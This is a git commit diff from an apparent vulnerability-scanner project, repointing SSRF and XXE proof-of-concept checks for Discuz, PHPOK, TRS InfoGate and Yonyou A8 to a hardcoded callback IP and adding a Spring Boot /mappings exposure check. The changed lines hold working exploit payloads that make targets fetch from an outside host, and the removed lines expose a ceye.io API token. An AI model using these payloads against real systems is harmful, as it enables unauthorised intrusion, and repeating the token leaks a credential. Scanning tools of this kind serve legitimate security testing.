add springboot vul

2018-03-30 18:41:05 +08:00
parent 2b6acb1d8c
commit 4f93e758ec
8 changed files with 42 additions and 8 deletions
--- a/.history
+++ b/.history
--- a/cms/discuz/discuz_forum_message_ssrf.py
+++ b/cms/discuz/discuz_forum_message_ssrf.py
@@ -25,11 +25,11 @@ class discuz_forum_message_ssrf_BaseVerify:
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
-        payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://dx3hbm.ceye.io/"+md5_str+".jpg[/img]&formhash=09cec465"
+        payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://45.76.158.91:6868/"+md5_str+".jpg[/img]&formhash=09cec465"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
-            eye_url = "http://api.ceye.io/v1/records?token=c04665a158430a100ed655f9c710e597&type=request"
+            eye_url = "http://45.76.158.91/web.log"
            time.sleep(6)
            reqr = requests.get(eye_url, timeout=10, verify=False)
            if md5_str in reqr.text:
--- a/cms/phpok/phpok_remote_image_getshell.py
+++ b/cms/phpok/phpok_remote_image_getshell.py
@@ -25,11 +25,11 @@ class phpok_remote_image_getshell_BaseVerify:
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
-        payload = "/index.php?c=ueditor&f=remote_image&upfile=http://dx3hbm.ceye.io/" + md5_str
+        payload = "/index.php?c=ueditor&f=remote_image&upfile=http://45.76.158.91:6868/" + md5_str
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
-            eye_url = "http://api.ceye.io/v1/records?token=c04665a158430a100ed655f9c710e597&type=request"
+            eye_url = "http://45.76.158.91/web.log"
            time.sleep(6)
            reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
            if md5_str in reqr.text:
--- a/cms/trs/trs_infogate_xxe.py
+++ b/cms/trs/trs_infogate_xxe.py
@@ -28,10 +28,10 @@ class trs_infogate_xxe_BaseVerify:
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
-        post_data = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://dx3hbm.ceye.io/'+md5_str+'">%remote;]>'
+        post_data = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://45.76.158.91:6868/'+md5_str+'">%remote;]>'
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
-            eye_url = "http://api.ceye.io/v1/records?token=c04665a158430a100ed655f9c710e597&type=request"
+            eye_url = "http://45.76.158.91/web.log"
            time.sleep(6)
            reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
            if md5_str in reqr.text:
--- a/cms/yonyou/yonyou_a8_personService_xxe.py
+++ b/cms/yonyou/yonyou_a8_personService_xxe.py
@@ -30,10 +30,10 @@ class yonyou_a8_personService_xxe_BaseVerify:
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
-        post_data = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://dx3hbm.ceye.io/'+md5_str+'">%remote;]>'
+        post_data = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://45.76.158.91:6868/'+md5_str+'">%remote;]>'
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
-            eye_url = "http://api.ceye.io/v1/records?token=c04665a158430a100ed655f9c710e597&type=request"
+            eye_url = "http://45.76.158.91/web.log"
            time.sleep(6)
            reqr = requests.get(eye_url, timeout=10, verify=False)
            if md5_str in reqr.text:
--- a/information/informationmain.py
+++ b/information/informationmain.py
@@ -6,6 +6,7 @@ referer: unknow
 author: Lucifer
 description: 包含所有information漏洞类型，封装成一个模块
 '''
+from information.springboot_api import springboot_api_BaseVerify
 from information.options_method import options_method_BaseVerify
 from information.robots_find import robots_find_BaseVerify
 from information.git_check import git_check_BaseVerify
--- a/information/springboot_api.py
+++ b/information/springboot_api.py
@@ -0,0 +1,32 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: spring boot 路径泄露
+referer: http://blog.csdn.net/u011687186/article/details/73457498
+author: Lucifer
+description: robots.txt是爬虫标准文件，可从文件里找到屏蔽了哪些爬虫搜索的目录
+'''
+import sys
+import requests
+import warnings
+from termcolor import cprint
+
+class springboot_api_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        payload = "/mappings"
+        vulnurl = self.url + payload
+        try:
+            req = requests.get(vulnurl, timeout=10, verify=False)
+
+            if "resourceHandlerMapping" in req.text and r"springframework.boot.actuate" in req.text:
+                cprint("[+]存在spring boot api路径泄露...(敏感信息)"+"\tpayload: "+vulnurl, "green")
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = springboot_api_BaseVerify(sys.argv[1])
+    testVuln.run()
--- a/pocdb.py
+++ b/pocdb.py
@@ -15,6 +15,7 @@ class pocdb_pocs:
    def __init__(self, url):
        self.url = url
        self.informationpocdict = {
+            "spring boot 路径泄露":springboot_api_BaseVerify(url),
            "options方法开启":options_method_BaseVerify(url),
            "git源码泄露扫描":git_check_BaseVerify(url),
            "java配置文件文件发现":jsp_conf_find_BaseVerify(url),